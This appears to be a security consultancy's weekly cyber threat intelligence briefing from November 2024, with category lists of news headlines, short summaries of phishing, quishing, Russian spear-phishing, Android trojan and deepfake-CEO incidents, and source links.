US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek

DocuSign's Envelopes API abused to send realistic fake invoices

Cyber Criminals Exploit DocuSign APIs to Send Fake Invoices - Infosecurity Magazine

Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware

Phishing Emails and Spam Are Similar, but There Are 5 Key Differences

Gmail Users Beware—Link Hovering Attacks On The Up

Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late

Scammers Target Starlink Users With Elaborate Phishing Scheme

Other Social Engineering

LastPass warns of fake support centers trying to steal customer data

Fake Copyright Infringement Emails Spread Rhadamanthys

Malware operators use copyright notices to lure in businesses | SC Media

Advanced Variant Of FakeCall Malware Targets Mobile Users

FBI recovers just $8M after crypto scam crashes Kansas bank • The Register

Things you should know about ‘digital arrest’ scams! - The Hindu BusinessLine

Artificial Intelligence

OODA Loop - Navigating the Risks, Challenges, and the Future of Trust in an Era of Synthetic and AI-Generated Media

The deepfake threat to CEOs | Fortune

How AI will shape the next generation of cyber threats - Help Net Security

Businesses Worldwide Targeted in Large-Scale ChatGPT Phishing Campaign - SecurityWeek

Experts warn some ChatGPT models can be hacked to launch deepfake scams | TechRadar

ChatGPT-4o can be used for autonomous voice-based scams

AI threats dictate a return to Human Intelligence | Cybernews

Hacker-Powered Security Report: Firms Turn to Human Intelligence Amid Rising AI Threats | Business Wire

Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine

OWASP Releases AI Security Guidance

Why Cyber Criminals Are Not Necessarily Embracing AI | HackerNoon

Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare

Trump plans to dismantle Biden AI safeguards after victory - Ars Technica

2FA/MFA

Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine

Gmail 2FA Cyber Attacks—Open Another Account Before It’s Too Late

Malware

New Malware Campaign Targets Windows Users Through Gaming Apps

Hackers increasingly use Winos4.0 post-exploitation kit in attacks

Industrial companies in Europe targeted with GuLoader - Help Net Security

5 Most Common Malware Techniques in 2024

MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews

New SteelFox malware hijacks Windows PCs using vulnerable driver

New MacOS Malware Linked to North Korean Hackers

Microsoft services exploited for stealthy malware deployment | SC Media

Large-Scale Phishing Campaign Exposed Using New Version Of Rhadamanthys Malware

Typosquat campaign impersonates 287+ popular npm packages • The Register

Cloudy With a Chance of RATs: Unveiling APT36 and the Evolution of ElizaRAT - Check Point Research

Bots/Botnets

Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar

Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media

Hackers hijack over 16,000 TP-Link network devices, creating a big ol' botnet that's absolutely slamming Microsoft Azure accounts | PC Gamer

Organisations are fighting a losing battle against advanced bots | TechRadar

Mobile

Advanced Variant Of FakeCall Malware Targets Mobile Users

New Android Banking Malware 'ToxicPanda' Targets Users with Fraudulent Money Transfers

Dangerous Android banking malware looks to trick victims with fake money transfers | TechRadar

Here's What I Do Whenever I Receive a Scam Message on WhatsApp

What Telegram’s recent policy shift means for cyber crime

Mobile & IoT Security Requires More Industry Attention

How I Spot Smishing Texts Easily (and You Can, Too)

Denial of Service/DoS/DDoS

UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine

DDoS site Dstat.cc seized and two suspects arrested in Germany

UK councils bat away DDoS barrage from Putin fanboys • The Register

Cyber attack disrupts classes at Irish technology university

Internet of Things – IoT

IoT Security Failures Can Be Sh*tty - Security Boulevard

Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel

Is your air fryer spying on you? Concerns over ‘excessive’ surveillance in smart devices | Smart homes | The Guardian

Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine

Mobile & IoT Security Requires More Industry Attention

Data Breaches/Leaks

Recovering From a Breach: 4 Steps Every Organisation Should Take  - Security Boulevard

Telecoms company Magnet+ investigating possible cyber attack – The Irish Times

Pacific Life Insurance Company Confirms Customer Data Leaked in Infosys McCamish Data Breach | Console and Associates, P.C. - JDSupra

Identity-related data breaches cost more than average incidents - Help Net Security

Nokia investigates breach after hacker claims to steal source code

Scissor-maker Fiskars sliced by hackers | Cybernews

Domestic abuse victim’s home address leaked to ex-partner after data breach | The Independent

210,000 Impacted by Saint Xavier University Data Breach - SecurityWeek

Organised Crime & Criminal Actors

Operation Synergia II sees Interpol swoop on cyber crims • The Register

Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine

Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs

Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum

The biggest underestimated security threat of today? Advanced persistent teenagers | TechCrunch

Inside the Massive Crime Industry That’s Hacking Billion-Dollar Companies | WIRED

Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg

How to Defend Against Alleged Snowflake Attacker… | Intel 471

What Telegram’s recent policy shift means for cyber crime

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

MacOS under attack by crypto thieves: malicious app disguises itself as PDF | Cybernews

FBI recovers just $8M after crypto scam crashes Kansas bank • The Register

Insider Risk and Insider Threats

FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info

Oh, the Humanity! How to Make Humans Part of Cyber Security

Insurance

Cyber insurers would not welcome ban on ransomware payments :: Insurance Day

Supply Chain and Third Parties

Banks urged to improve resilience to IT meltdowns • The Register

Supply Chain Attack Uses Smart Contracts for C2 Ops - Infosecurity Magazine

New Report from BlueVoyant Shows Progress in Third-Party Cyber Risk Management, But Breaches Persist

The State of Supply Chain Defence in 2024 Report

Serco, DHL among firms affected by Microlise cyber attack | ITPro

Pacific Life Insurance Company Confirms Customer Data Leaked in Infosys McCamish Data Breach | Console and Associates, P.C. - JDSupra

Cloud/SaaS

Hackers hijack over 16,000 TP-Link network devices, creating a big ol' botnet that's absolutely slamming Microsoft Azure accounts | PC Gamer

The future of cloud computing: Top trends and predictions | TechTarget

5 SaaS Misconfigurations Leading to Major Fu*%@ Ups

Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine

Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews

Outages

Banks urged to improve resilience to IT meltdowns • The Register

Identity and Access Management

Identity-related data breaches cost more than average incidents - Help Net Security

Encryption

“Q Day” Is Coming: Is the World Prepared? - Centre for International Governance Innovation

Banque de France and Monetary Authority of Singapore Conduct Groundbreaking Post-quantum Cryptography Experiment to Enhance Communication Security | Disruption Banking

Quantum Has Landed, So Now What?

Linux and Open Source

Dangerous new phishing campaign infects Windows devices with malicious Linux VM | TechRadar

Beware of phishing emails delivering backdoored Linux VMs! - Help Net Security

Meet Interlock — The new ransomware targeting FreeBSD servers

Passwords, Credential Stuffing & Brute Force Attacks

Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network | Microsoft Security Blog

Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft

Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media

A Hacker's Guide to Password Cracking

Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online

Social Media

South Korea fines Meta about $15 mln over collection of user data | Reuters

Facebook asks US supreme court to dismiss fraud suit over Cambridge Analytica scandal | Facebook | The Guardian

Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns

Malvertising

NCSC Publishes Tips to Tackle Malvertising Threat - Infosecurity Magazine

Training, Education and Awareness

How Cyber Security Training Must Adapt to a New Era of Threats - Security Boulevard

Regulations, Fines and Legislation

The SEC’s cyber security and disclosure rules: The questions compliance pros still have | Society of Corporate Compliance and Ethics (SCCE) - JDSupra

NIS2: Where do European Countries Stand on Implementing Cyber Security Strategies? | Orrick, Herrington & Sutcliffe LLP - JDSupra

Banks urged to improve resilience to IT meltdowns • The Register

Navigating the EU’s “NIS 2” Directive: Key Cyber Security Compliance Points for Businesses Operating in the EU to Consider | Pillsbury Winthrop Shaw Pittman LLP - JDSupra

The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra

Government-backed cyber security has a long way to go, warns Arctic Wolf

Facebook asks US supreme court to dismiss fraud suit over Cambridge Analytica scandal | Facebook | The Guardian

Apple could face EU's first-ever DMA fine as soon as this month - 9to5Mac

Exploring DORA: How to manage ICT incidents and minimize cyber threat risks

HIPAA Not ‘Strong Enough’ for Health Care’s Cyber Security Needs

South Korea fines Meta about $15 mln over collection of user data | Reuters

Biden administration prepares second executive order on cyber security | SC Media

Germany drafts law to protect researchers who find security flaws

Trump plans to dismantle Biden AI safeguards after victory - Ars Technica

Combating Cyber Crime: What to Expect From Trump Presidency?

Models, Frameworks and Standards

NIS2: Where do European Countries Stand on Implementing Cyber Security Strategies? | Orrick, Herrington & Sutcliffe LLP - JDSupra

Navigating the EU’s “NIS 2” Directive: Key Cyber Security Compliance Points for Businesses Operating in the EU to Consider | Pillsbury Winthrop Shaw Pittman LLP - JDSupra

The NIS 2 Era Is Here: Are You Compliance-Ready? | Goodwin - JDSupra

Exploring DORA: How to manage ICT incidents and minimize cyber threat risks

OWASP Releases AI Security Guidance

NIST CSF 2.0 Critical - Security Boulevard

Data Protection

Consumer privacy risks of data aggregation: What should organisations do? - Help Net Security

South Korea fines Meta about $15 mln over collection of user data | Reuters

Careers, Working in Cyber and Information Security

24% of CISOs actively looking to leave their jobs | CSO Online

A grassroots movement to tackle cyber skills gap | Professional Security Magazine

UK Cyber Security Wages Soar Above Inflation as Stress Levels Rise - Infosecurity Magazine

Cyber security salaries are rising, but some professionals wonder if the stress and burnout is worth it | ITPro

Proactive Ways To Bridge The Cyber Security Talent Gap

How Playing Cyber Games Can Help You Get Hired

Keep Learning or Keep Losing: There's No Finish Line

US Coast Guard's New Cyber Units: A Game Changer for National Security - ClearanceJobs

Want to attract diverse cyber talent? Go beyond the same-old recruiting techniques | SC Media

MoD seeks leader for ‘defensive cyber operations’ – PublicTechnology

How CISOs can turn around low-performing cyber pros | CSO Online

Law Enforcement Action and Take Downs

FBI arrested former Disney World employee for hacking computer menus and mislabeling allergy info

Operation Synergia II sees Interpol swoop on cyber crims • The Register

Massive Nigerian Cyber Crime Bust Sees 130 Arrested - Infosecurity Magazine

Interpol operation nets 41 arrests, takedown of 22,000 malicious IPs

DDoS site Dstat.cc seized and two suspects arrested in Germany

FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions

Hacker Said to Be Behind Breach of Snowflake (SNOW) Customers Arrested - Bloomberg

How to Defend Against Alleged Snowflake Attacker… | Intel 471

Gov't IT contractors arrested for defrauding the feds • The Register

US Sentences Nigerian to 26 Years in Prison for Stealing Millions Through Phishing - SecurityWeek

FBI recovers just $8M after crypto scam crashes Kansas bank • The Register

Police Doxing of Criminals Raising Ransomware-Attack Stakes

Misinformation, Disinformation and Propaganda

Russian disinformation campaign active ahead of 2024 US election

US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine

CISA: U.S. election disinformation peddled at massive scale | TechTarget

Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard

US warns of Russia and Iran’s disinformation campaigns as election day unfolds

False bomb threats only blemish on Election Day voting process

Russian Fake News and Bomb Threats Target Election Day Votes

Despite 'unprecedented' amount of disinformation, no evidence it will directly impact outcome of election, US cyber security chief says

Here are the post-election disinfo threats experts are watching for


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

IT Security Centralization Makes Industrial Spies Profitable

The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council

What are the key Threats to Global National Security? - IT Security Guru

Lord Harries links nuclear to cyber threats

Nation State Actors

Despite 'unprecedented' amount of disinformation, no evidence it will directly impact outcome of election, US cyber security chief says

Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum

China

Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network | Microsoft Security Blog

Microsoft reveals major Chinese botnet is attacking users across the world | TechRadar

Microsoft Warns of Chinese Botnet Exploiting Router Flaws for Credential Theft

Chinese APTs Cash In on Years of Edge Device Attacks

Thousands of hacked TP-Link routers used in years-long account takeover attacks - Ars Technica

Sophos Warns Chinese Hackers Are Becoming Stealthier - Infosecurity Magazine

NCSC Details ‘Pygmy Goat’ Backdoor Planted on Hacked Sophos Firewall Devices - SecurityWeek

Microsoft credentials pilfered by APT Storm via botnet spray-and-pray router attack | SC Media

China's elite hackers expand target list to European Union | CyberScoop

China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait

Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard

China's Volt Typhoon breached Singtel, reports say • The Register

Chinese Group Accused of Hacking Singtel in Telecom Attacks - Bloomberg

FBI Seeks Public Help to Identify Chinese Hackers Behind Global Cyber Intrusions

Is your air fryer spying on you? Concerns over ‘excessive’ surveillance in smart devices | Smart homes | The Guardian

Chinese Air Fryers May Be Spying on Consumers, Which? Warns - Infosecurity Magazine

Canada Orders TikTok to Shut Down Canadian Operations Over Security Concerns

Russia

The West must respond to Russia’s rapidly escalating hybrid warfare - Atlantic Council

N Korea may receive tech in exchange for military support • The Register

CISA: US election disinformation peddled at massive scale | TechTarget

Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard

Cyber attack sparks extra security at Portsmouth council - BBC News

UK Council Sites Recover Following Russian DDoS Blitz - Infosecurity Magazine

Russian disinformation campaign active ahead of 2024 US election

US Says Russia Behind Fake Haitian Voters Video - Infosecurity Magazine

False bomb threats only blemish on Election Day voting process

Russian Fake News and Bomb Threats Target Election Day Votes

Here are the post-election disinfo threats experts are watching for

Cyber Threats Increase as Russia, China Train New Criminals - Africa Defense Forum

Experts warn of 'incredibly severe' threat of cyber attacks by Russia and North Korea - Mirror Online

1 Million Cyber Attacks Made On Montco Election, Mainly From Russia | Norristown, PA Patch

Iran

CISA: U.S. election disinformation peddled at massive scale | TechTarget

Misinformation is Ruining our Elections. Here’s How we can Rescue Them. - Security Boulevard

Iranian Threat Actors Ramp Up Ransomware, Cyber Activity

Iranian APT Targets IP Cameras, Extends Attacks Beyond Israel

Here are the post-election disinfo threats experts are watching for

Inside Iran's Cyber Playbook: AI, Fake Hosting, and Psychological Warfare

North Korea

N Korea may receive tech in exchange for military support • The Register

New MacOS Malware Linked to North Korean Hackers

Experts warn of 'incredibly severe' threat of cyber attacks by Russia and North Korea - Mirror Online


Tools and Controls

Banks urged to improve resilience to IT meltdowns • The Register

Disaster recovery planning is key in the modern-day business environment

AI threats dictate a return to Human Intelligence | Cybernews

Hacker-Powered Security Report: Firms Turn to Human Intelligence Amid Rising AI Threats | Business Wire

What is Unified Threat Management (UTM)? | Definition from TechTarget

Recovering From a Breach: 4 Steps Every Organisation Should Take - Security Boulevard

Google Says Its AI Found SQLite Vulnerability That Fuzzing Missed - SecurityWeek

Google Cloud to Mandate Multifactor Authentication by 2025 - Infosecurity Magazine

New cyber security advisory highlights defence-in-depth strategies

Oh, the Humanity! How to Make Humans Part of Cyber Security

How to Win at Cyber by Influencing People

Security Assessment Reports: A Complete Overview - Security Boulevard

Unpacking API Security from Development to Runtime: Key Insights for Cyber Security Pros - Security Boulevard

The human factor in cyber resilience | UKAuthority

Typosquat campaign impersonates 287+ popular npm packages • The Register

Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority

Defenders Outpace Attackers in AI Adoption - Infosecurity Magazine

4 Main API Security Risks Organisations Need to Address

The ins and outs of threat emulation | TechRadar

Navigating the evolving landscape of cyber risk management

Germany drafts law to protect researchers who find security flaws

What is a Cyber Range? - Security Boulevard

Okta’s ‘secure by design’ pledge suffers a buggy setback | CSO Online

Effective Phishing Exercises: How To Plan, Execute And Follow Up

AWS security essentials for managing compliance, data protection, and threat detection - Help Net Security

Inside the mind of a ransomware negotiator: what it’s really like to deal with cyber criminals - Raconteur

Microsoft 365 security blind spots: Is your business exposed? - Partner Content - Security - iTnews



Other News

Cyber security in crisis: Are we ready for what's coming? - Help Net Security

CISO Top 10 Priorities for Q3 2024: Navigating Cyber Security's Evolving Challenges | SC Media

More and more small businesses are being hit with security attacks — but they're fighting back | TechRadar

The ironic vulnerability: why insurers are prime targets for cyber attacks

Cyber attack disrupts classes at Irish technology university

Public sector cyber break-ins: Our money, our right to know • The Register

'Unauthorized activity' downs Washington's court systems • The Register

The Internet's Defenders Are Running Out of Money—And We're All at Risk | IBTimes

How to Win at Cyber by Influencing People

Scotland’s Digital Office highlights tabletop cyber security exercises | UKAuthority

How early-stage companies can go beyond cyber security basics | CyberScoop

How to Outsmart Stealthy E-Crime and Nation-State Threats

Cyber Trends: Keep an Eye on Critical Infrastructure Sectors

Five ways cyber criminals target healthcare and how to stop them | ITPro

JPMorgan CISO says three trends play a role in how he protects the banking giant | Fortune

Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems

Don't search for information on cats at work — you could be at risk of being hacked | TechRadar

Combating Cyber Crime: What to Expect From Trump Presidency?

Facing Growing Threats, Space Industry Expands Its Cyber Warning Center

Governments are facing a huge surge in cyber attacks | TechRadar

Cyber Threats That Could Impact the Retail Industry This Holiday Season (and What to Do About It)

Cyber attack on American Water: A warning to critical infrastructure

Busting the Air Gap Myth: OT Security's Blind Spot



Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.


Black Arrow Cyber Threat Intelligence Briefing 01 November 2024

Black Arrow Cyber Threat Intelligence Briefing 01 November 2024:

-Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams

-Russia Carrying Out Targeted Attacks In UK, Microsoft Warns

-Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack

-Business Email Compromise Scams Dominate Q3 2024 Threats

-This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers

-What Military Wargames Can Teach About Cyber Security

-Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them

-The Overlooked Importance of Identifying the Riskiest Users

-Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.

-Small Businesses Boosting Cyber Security as Threats Grow

-The Rise of the vCISO: From Niche to Necessity?

-Five Eyes Agencies Offer Security Advice for Small Businesses

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Banks and Regulators Warn of Rise in ‘Quishing’ QR Code Scams

Banks and regulators have flagged a concerning rise in "quishing" scams, where fraudsters use QR codes in emails to bypass corporate cyber security. This technique, involving QR codes in PDF attachments, often evades standard security filters, tricking recipients into disclosing financial details. Having grown during the pandemic, such scams now represent over 20% of UK online scams, with reports doubling in the past year. While these scams frequently occur via email, they also target public QR code installations, from parking meters to EV chargers. As quishing continues to evolve, organisations may need to enhance detection capabilities to counter this growing threat.

Russia Carrying Out Targeted Attacks In UK, Microsoft Warns

Microsoft and AWS have issued warnings about targeted cyber attacks by a Russian-backed group, aimed primarily at the UK and other countries. Known as Midnight Blizzard or APT29, this group has been using highly targeted spear-phishing emails since October to infiltrate government, defence, academic, and non-profit sectors. Posing as Microsoft or AWS staff, attackers use social engineering techniques involving remote access protocol attachments that create direct connections to attacker-controlled servers. This method can expose user credentials and facilitate unauthorised access to sensitive information, including device resources, potentially allowing attackers to install persistent malware on compromised systems.

Spoof Eventbrite Phishing Emails Lure in Victims in Major Attack

Cyber criminals have increasingly exploited Eventbrite’s platform, with a 900% surge in phishing attacks using this trusted event management service. Hackers create fake events under familiar brand names, leveraging Eventbrite's built-in mailing system to distribute phishing emails that bypass common security filters due to the trusted domain of ‘noreply@events.eventbrite.com’. Through these messages, victims are urged to take immediate action, often leading to the disclosure of sensitive data like login credentials, tax identification numbers, and payment details. This method has proven effective, highlighting the need for heightened vigilance around trusted online platforms.

Business Email Compromise Scams Dominate Q3 2024 Threats

The VIPRE Security Group’s recent report highlights the increasing sophistication of Business Email Compromise (BEC) scams, which accounted for 58% of phishing attempts and heavily relied on impersonating authority figures such as CEOs and IT staff, representing 89% of these attacks. Techniques like URL redirection and harmful attachments disguised as critical documents have increased, underscoring the need for robust cyber security measures and employee awareness, especially approaching the holiday season.

This Nasty Android Trojan is Hijacking Calls to Your Bank and Sending Them to Hackers

A recent report highlights a sophisticated threat from the Android-based FakeCall trojan, which intercepts sensitive calls by replacing the phone’s default dialler. This malicious software enables hackers to hijack both incoming and outgoing calls, allowing them to impersonate bank staff and gather sensitive data from unsuspecting users. FakeCall is distributed through malicious apps that exploit Android’s accessibility features. Since its detection in 2022, FakeCall has expanded its reach, now able to mimic over 20 financial organisations. This trojan's continuous development, including screen streaming and screenshot capabilities, points to its evolving potency.

What Military Wargames Can Teach About Cyber Security

Tabletop wargaming has become an essential tool in cyber security, helping organisations prepare for the swift, critical decisions required in the first 24-48 hours of a ransomware attack. Despite the widespread use of technologies to prevent cyber attacks, 2024 has seen an increase in ransomware and data breaches, exposing gaps in many companies' response capabilities. By simulating realistic ransomware scenarios, tabletop exercises enable organisations to stress-test response strategies, address compliance gaps, and refine their disaster recovery plans. This hands-on approach enhances organisational resilience, ensuring leadership and cross-functional teams are equipped for effective incident response and secure recovery. Black Arrow Cyber Consulting provides proctored tabletop cyber incident response exercises, enabling firms to better handle and recover from cyber incidents.

Businesses Expect Cyber Threats to Rise, but Aren’t Ready for Them

Recent research indicates UK businesses are increasingly concerned about cyber threats, with 75% of companies reporting a rise in attempted attacks and nearly 40% experiencing a successful breach. Despite these concerns, only 35% of leaders feel adequately prepared to handle cyber incidents. This gap between awareness and readiness highlights the need for robust, proactive security measures, especially as the UK emerges as the most targeted country in Europe. As organisations recognise the strategic value of cyber security, embedding it into decision-making becomes essential to protect against evolving digital risks and ensure future resilience.

The Overlooked Importance of Identifying the Riskiest Users

Reach Security highlights the significance of identifying and managing the riskiest users within an organisation. Their findings indicate that 80% to 90% of cyber security threats are linked to just 3% to 5% of users, with 20% of these high-risk individuals changing each month. Implementing a "see one, do one, teach one" model, similar to healthcare’s incremental learning, can empower high-risk users to understand and mitigate specific threats. This approach helps organisations allocate resources more effectively, reduce dependency on numerous security tools, and foster a more resilient cyber security culture by enabling high-risk users to act as advocates within the organisation.

Hackers Targeted a $12 Billion Cyber Security Company with a Deepfake of Its CEO. Here's Why Small Details Made It Unsuccessful.

A recent incident involving $12 billion cyber security firm Wiz highlights the growing threat of deepfake scams targeting top executives. Hackers attempted to use an audio deepfake of Wiz’s CEO, Assaf Rappaport, to steal employee credentials, aiming to access the firm’s internal systems and data. The attempt failed because employees recognised the CEO’s distinct speech patterns. Deepfake scams are increasingly sophisticated, with recent reports indicating that half of global companies have faced such attacks, and 66% of business leaders see deepfakes as a serious risk to their organisations.

Small Businesses Boosting Cyber Security as Threats Grow

The Identity Theft Resource Center’s latest report highlights that small businesses are increasingly bolstering their cyber security efforts in response to growing identity-related cyber attacks. Over 80% of small businesses reported experiencing a cyber attack or data breach in the past year, with financial losses exceeding $500,000 and in some cases doubling. In response, many small businesses are ramping up investment in security tools, staff training, and vendor checks. Additionally, as new state privacy laws emerge, over 75% of small business leaders express concern about compliance, spurring increased focus on data protection practices.

The Rise of the vCISO: From Niche to Necessity?

The rise of virtual Chief Information Security Officers (vCISOs) highlights a shift in cyber security for small and medium-sized businesses (SMBs). With cyber threats evolving rapidly, vCISOs offer flexible, high-level security expertise that strengthens defences while remaining cost-effective. vCISOs help organisations navigate complex regulatory requirements and manage emerging technologies, such as IoT and machine learning, ensuring a tailored security approach that promotes resilience and business growth. Speak to Black Arrow about our fully scalable and flexible vCISO service to help organisations of all sizes and sectors.

Five Eyes Agencies Offer Security Advice for Small Businesses

The Five Eyes alliance, composed of intelligence agencies from the US, UK, Canada, Australia, and New Zealand, has issued new security guidelines to support small businesses, especially tech firms, in defending against cyber attacks. These guidelines focus on safeguarding intellectual property from sophisticated state-backed actors, such as China, as well as criminal groups and competitors. Recommendations include appointing dedicated security managers, keeping a comprehensive asset inventory, and managing data access with third-party partners. This coordinated effort aims to strengthen business security globally, reducing vulnerabilities across both private and public sectors.

Sources:

https://www.ft.com/content/8aca741e-6448-4511-a54d-64f3a97747b1

https://www.silicon.co.uk/security/microsoft-aws-attacks-russia-586762

https://www.techradar.com/pro/security/spoof-eventbrite-phishing-emails-look-to-lure-in-victims-in-major-attack

https://securitybrief.co.nz/story/business-email-compromise-scams-dominate-q3-2024-threats

This nasty Android trojan is hijacking calls to your bank and sending them to hackers — how to stay safe | Tom's Guide

https://www.informationweek.com/cyber-resilience/what-military-wargames-can-teach-us-about-cybersecurity

https://www.techradar.com/pro/businesses-expect-cyber-threats-to-rise-but-arent-ready-for-them

https://www.darkreading.com/threat-intelligence/the-overlooked-importance-of-identifying-riskiest-users

https://www.entrepreneur.com/business-news/hackers-sent-a-deepfake-of-wiz-ceo-to-dozens-of-employees/482027

https://securityboulevard.com/2024/10/small-businesses-boosting-cybersecurity-as-threats-grow-itrc/

https://www.csoonline.com/article/3595617/the-rise-of-the-vciso-from-niche-to-necessity.html

https://www.scworld.com/news/five-eyes-agencies-offers-security-advice-for-small-businesses


Governance, Risk and Compliance

The 10 biggest issues CISOs and cyber teams face today | CSO Online

Businesses expect cyber threats to rise, but aren’t ready for them | TechRadar

More than a third of UK businesses lack expertise in emerging tech risks amid cyber attacks – Hiscox | Insurance Times

Most companies are bracing for a cyber attack within a year

For a Stronger Security Culture, Replace Sticks With Carrots

The rise of the vCISO: From niche to necessity? | CSO Online

Security outsourcing on the rise as CISOs seek cyber relief | CSO Online

Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard

The State of Cyber Security: Challenges, Priorities and Insights - Infosecurity Magazine

CISOs as Organisational Bridge Builders for Cyber Security Culture | HackerNoon

13 Cyber Crime Facts That Will Give You Chills | HackerNoon

A Halloween Haunting: Unveiling Cyber Security’s Scary Stats

Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard

Spooky Cyber Stats and Trends in Time for Halloween

Five Eyes agencies offer security advice for small businesses | SC Media

Security priorities emphasize CISO role on the rise | CSO Online

Three quarters of businesses report rise in cyber attacks

Is Your Business Truly Safe From Risk? | Entrepreneur

What Military Wargames Can Teach Us About Cyber Security

NCSC warns of gap between threats and defence capabilities

99% of CISOs work extra hours every week - Help Net Security

How CIOs and CISOs can partner to improve workforce productivity and security | CIO

Cyber attacks threaten business reputation and brand trust - The Royal Gazette | Bermuda News, Business, Sports, Events, & Community |

The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard


Threats

Ransomware, Extortion and Destructive Attacks

Black Basta ransomware poses as IT support on Microsoft Teams to breach networks

In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail

Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations

Fog ransomware targets SonicWall VPNs to breach corporate networks

Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online

Black Basta operators phish employees via Microsoft Teams - Help Net Security

2024 looks set to be another record-breaking year for ransomware — and it's likely going to get worse | TechCrunch

North Korean govt hackers linked to Play ransomware attack

Three common privilege access mistakes that can lead to a ransomware incident | SC Media

Russia sentences REvil ransomware members to over 4 years in prison

Massive PSAUX ransomware attack targets 22,000 CyberPanel instances

REvil convictions unlikely to curb Russian cyber crime | TechTarget

Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security

The ransomware negotiation playbook adds new chapters | CSO Online

Ransomware Victims

OnePoint Patient Care Data Breach Exposes 795,000 Records

Atende refused to pay the ransom, and now pays the price | CSO Online

Interbank confirms data breach following failed extortion, data leak

Ransomware hits web hosting servers via vulnerable CyberPanel instances - Help Net Security

Phishing & Email Based Attacks

Cyber Scams & Why We Fall for Them - Security Boulevard

BEC cyber attacks have the highest financial impact - Digital Journal

This nasty Android trojan is hijacking calls to your bank and sending them to hackers — how to stay safe | Tom's Guide

Business Email Compromise scams dominate Q3 2024 threats

The Weapon of Choice of Cyber Criminals: BEC Impersonation

Spoof Eventbrite phishing emails look to lure in victims in major attack | TechRadar

Threat actors are stepping up their tactics to bypass email protections - Help Net Security

Black Basta operators phish employees via Microsoft Teams - Help Net Security

Phishers reach targets via Eventbrite services - Help Net Security

Spooky Spam, Scary Scams: Halloween Threats Rise - Security Boulevard

Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek

Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks

Facebook Businesses Targeted in Infostealer Phishing Campaign

Cyber criminals are leveraging big retail names in attacks this holiday season | TechRadar

Over a thousand online shops hacked to show fake product listings

Russian spies using remote desktop protocol files to phish • The Register

New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine

Hackers are swiping cookies to bypass email security, FBI says - UPI.com

